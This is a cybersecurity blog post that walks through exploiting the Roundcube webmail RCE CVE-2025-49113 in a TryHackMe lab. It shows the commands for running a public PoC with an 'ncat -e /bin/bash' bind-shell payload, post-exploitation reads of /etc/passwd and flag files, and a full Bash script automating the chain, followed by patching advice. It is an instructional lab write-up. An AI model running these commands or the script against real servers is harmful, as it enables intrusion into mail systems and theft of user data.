Logo
Waseem Akram
HomeAboutResumeBlogContactVU Study MaterialStore
W
Waseem Akram

Cybersecurity expert, web developer, and educator dedicated to sharing knowledge and empowering others in the tech world.

LinkedInGitHubFacebookInstagramYouTubeWhatsApp

Quick Links

  • Home
  • About
  • Services
  • Blog
  • VU Study Material
  • Contact
  • Resume
  • Store
  • Support Me

Contact Info

  • hello@hackerwasii.com
  • +92 313 711 9351
  • Okara, Punjab Pakistan

Newsletter

Subscribe to receive updates on new content, tutorials, and cybersecurity tips.

I respect your privacy. Unsubscribe at any time.

Now Playingon Spotify
Β© 2025 Waseem Akram. All rights reserved.Made with in Pakistan
Privacy PolicyTerms of ServiceRefund PolicyCookies Policy
CVE-2025-49113RoundcubeRCEExploitTryHackMe Walkthrough

Roundcube RCE Vulnerability Explained [CVE-2025-49113] - TryHackMe Walkthrough

W
Waseem AkramVerified account
Researcher, Pentester, Dev
2025-06-21
5 min read
2,618 views
Featured image for Roundcube RCE Vulnerability Explained [CVE-2025-49113] - TryHackMe Walkthrough

Introduction

Roundcube is a free and open-source webmail software used by thousands of hosting providers and organizations around the world. It supports more than 80 languages, is highly extensible, and integrates well with various SQL backends. But even the most trusted tools can have cracks in their armor.

Recently, a critical vulnerability (CVE-2025-49113) was discovered in Roundcube versions 1.5.x and 1.6.x (prior to 1.5.10 and 1.6.11). This flaw allows authenticated remote code execution (RCE) via insecure PHP object deserialization. With a CVSS score of 9.9, this vulnerability is a ticking time bomb for any unpatched installation.

In this blog post, we’ll:

Advertisement

  • Break down what causes this vulnerability
  • Walk through the manual exploitation
  • Showcase an automated exploit script
  • Provide insights from a TryHackMe-style vulnerable lab

What Is CVE-2025-49113?

πŸ” The Root Cause

The vulnerability stems from the upload.php endpoint in Roundcube, which mishandles the _from parameter by deserializing it without validating whether it contains safe data. If an attacker provides malicious serialized PHP data, it gets deserialized and executed β€” leading to arbitrary code execution on the target.

πŸ“¦ Affected Versions

  • All 1.5.x before 1.5.10
  • All 1.6.x before 1.6.11

The issue was identified by Kirill Firsov, and patched commits clearly show added input validation using rcube_utils::is_simple_string() to sanitize the _from parameter.


Manual Exploitation

Let’s walk through how this exploit works in a lab using TryHackMe:

Advertisement

πŸ›  Environment Setup

  • Roundcube version: 1.6.10
  • Credentials:
    • Username: ellieptic
    • Password: ChangeMe123
  • URL: http://MACHINE_IP/roundcube

πŸ”“ Step-by-Step Exploitation

  1. Login to Roundcube with provided credentials.
  2. Clone the exploit PoC:
    git clone https://github.com/fearsoff-org/CVE-2025-49113
    cd CVE-2025-49113
  3. Inspect the script: CVE-2025-49113.php
    • It retrieves a CSRF token and session cookie.
    • It crafts a malicious serialized payload.
    • Injects that into the _from parameter.
    • Sends a POST request to upload.php.
  4. Launch the exploit:
    php CVE-2025-49113.php http://MACHINE_IP/roundcube ellieptic ChangeMe123 "ncat -lvnp 4444 -e /bin/bash"
  5. Connect via netcat:
    nc MACHINE_IP 4444
    If the screen hangs, that's a good sign. Type pwd, whoami to verify shell access.

Post-Exploitation Findings

πŸ‘€ Maggie's Last Name

You can find user details from /etc/passwd:

grep -i maggie /etc/passwd

Output:

maggie****:x:1002:1002:Maggie ****,,,:/home/maggie****:/bin/bash

βœ… Answer: Redacted

Advertisement

🚩 Flag Location

To find flags, try:

find /etc -type f -iname '*flag*' -exec cat {} +

Automating the Exploit

To speed things up, we created a fully automated Bash script that:

  • Clones the exploit
  • Runs it with a payload
  • Connects to the bind shell
  • Grabs Maggie’s last name
  • Dumps any /etc/ flag files

πŸ’» Script: roundcube_exploit.sh

The complete automated exploit script is available on GitHub: πŸ”— Download roundcube-exploit.sh (or scroll back if you're reading inline)

Advertisement

#!/bin/bash
 
# Roundcube CVE-2025-49113 Exploit + Post Exploitation Automation
# Author: Waseem Akram(hackerwasii)
# Purpose: Shell, sniff Maggie, snag the flag
 
# ----------------------------
# CONFIGURATION
# ----------------------------
MACHINE_IP="$1"
USERNAME="username"  # Replace with actual username
PASSWORD="password"  # Replace with actual password
PORT=4444
EXPLOIT_DIR="CVE-2025-49113"
EXPLOIT_REPO="https://github.com/fearsoff-org/CVE-2025-49113.git"
EXPLOIT_FILE="CVE-2025-49113.php"
TARGET_URL="http://$MACHINE_IP/roundcube"
SHELL_PAYLOAD="ncat -lvnp $PORT -e /bin/bash"
 
# ----------------------------
# PRECHECKS
# ----------------------------
if [ -z "$MACHINE_IP" ]; then
  echo "[!] Usage: $0 <MACHINE_IP>"
  exit 1
fi
 
for tool in php git nc grep; do
  if ! command -v $tool &>/dev/null; then
    echo "[!] Missing required tool: $tool"
    exit 2
  fi
done
 
echo "[*] Launching exploit on Roundcube at $TARGET_URL..."
 
# ----------------------------
# CLONE EXPLOIT REPO
# ----------------------------
if [ ! -d "$EXPLOIT_DIR" ]; then
  echo "[*] Cloning PoC repo..."
  git clone "$EXPLOIT_REPO" || { echo "[!] Git clone failed."; exit 3; }
fi
 
cd "$EXPLOIT_DIR" || exit
 
# ----------------------------
# RUN EXPLOIT
# ----------------------------
echo "[*] Executing exploit..."
php "$EXPLOIT_FILE" "$TARGET_URL" "$USERNAME" "$PASSWORD" "$SHELL_PAYLOAD" &
EXPLOIT_PID=$!
 
# ----------------------------
# WAIT FOR BIND SHELL TO SPAWN
# ----------------------------
sleep 6
 
echo "[*] Connecting to bind shell on port $PORT..."
(
  sleep 1
  echo "whoami"
  sleep 1
  echo "pwd"
  sleep 1
  echo "echo 'πŸ“œ Searching /etc/passwd for Maggie...'"
  echo "grep -i maggie /etc/passwd"
  sleep 1
  echo "echo '🚩 Searching for flags in /etc...'"
  echo "find /etc -type f -iname '*flag*' 2>/dev/null | while read f; do echo \"--- Flag in: \$f ---\"; cat \"\$f\"; done"
  sleep 1
  echo "echo '🀠 Done. Ride safe, partner.'"
  sleep 2
) | nc "$MACHINE_IP" "$PORT"
 
# ----------------------------
# CLEANUP
# ----------------------------
kill $EXPLOIT_PID &>/dev/null
 
echo "[*] Script complete. If you saw Maggie’s last name and the flag, yer good to ride off into the sunset."
echo "[*] Remember to patch Roundcube ASAP!"
exit 0
# End of script

Mitigation & Recommendations

  • Patch Immediately: Upgrade to 1.5.10 or 1.6.11.
  • Disable upload.php if the feature is unused.
  • Monitor traffic to upload.php for strange _from parameters.

Final Thoughts

This vulnerability is a great example of how dangerous PHP object deserialization can be when mishandled. While the exploit requires valid credentials, many shared hosting environments with weak passwords could be easily compromised.

Always audit your dependencies, stay updated, and sanitize all user inputs β€” especially those being deserialized.


πŸ” Quick Recap for TryHackMe Users

Step Action
βœ… Log in as ellieptic
βœ… Clone & run exploit
βœ… Connect via netcat
βœ… Dump /etc/passwd for Maggie's last name
βœ… Read flag from /etc/

If you found this post helpful, please share it with your network. Together, we can make the web a safer place!

Advertisement

CVE-2025-49113RoundcubeRCEExploitTryHackMe Walkthrough
W

Waseem AkramVerified account

Researcher, Pentester, Dev

Cybersecurity expert and educator with a passion for sharing knowledge and helping others stay safe online.

Comments

Comments are currently disabled. Please share your thoughts on social media.

Related Articles

Cipher's Secret Message – TryHackMe Walkthrough
DecryptionTryHackMe Walkthrough

Cipher's Secret Message – TryHackMe Walkthrough

Decrypt a secret message encrypted with a shifting Caesar cipher and retrieve the flag in this TryHackMe walkthrough. Sharpen your cryptography skills by analyzing code to get the flag.

2025-07-063 min read
Volatility Essentials Walkthrough – Complete Memory Forensics Guide with Volatility 3
VolatilityMemory Forensics+3

Volatility Essentials Walkthrough – Complete Memory Forensics Guide with Volatility 3

Master memory forensics with this hands-on Volatility Essentials walkthrough from TryHackMe. Learn how to detect malware, analyze memory dumps, automate analysis, and hunt rootkits using Volatility 3.

2025-06-254 min read
πŸš€ Getting Started with Bash Scripting: Level Up Your Automation Game
ProgrammingLinux+2

πŸš€ Getting Started with Bash Scripting: Level Up Your Automation Game

Yo, stop typing commands like a noob! Learn how to write and run your first Bash script with this step-by-step guide. Automate your life and boost productivity like a pro!

2025-05-044 min read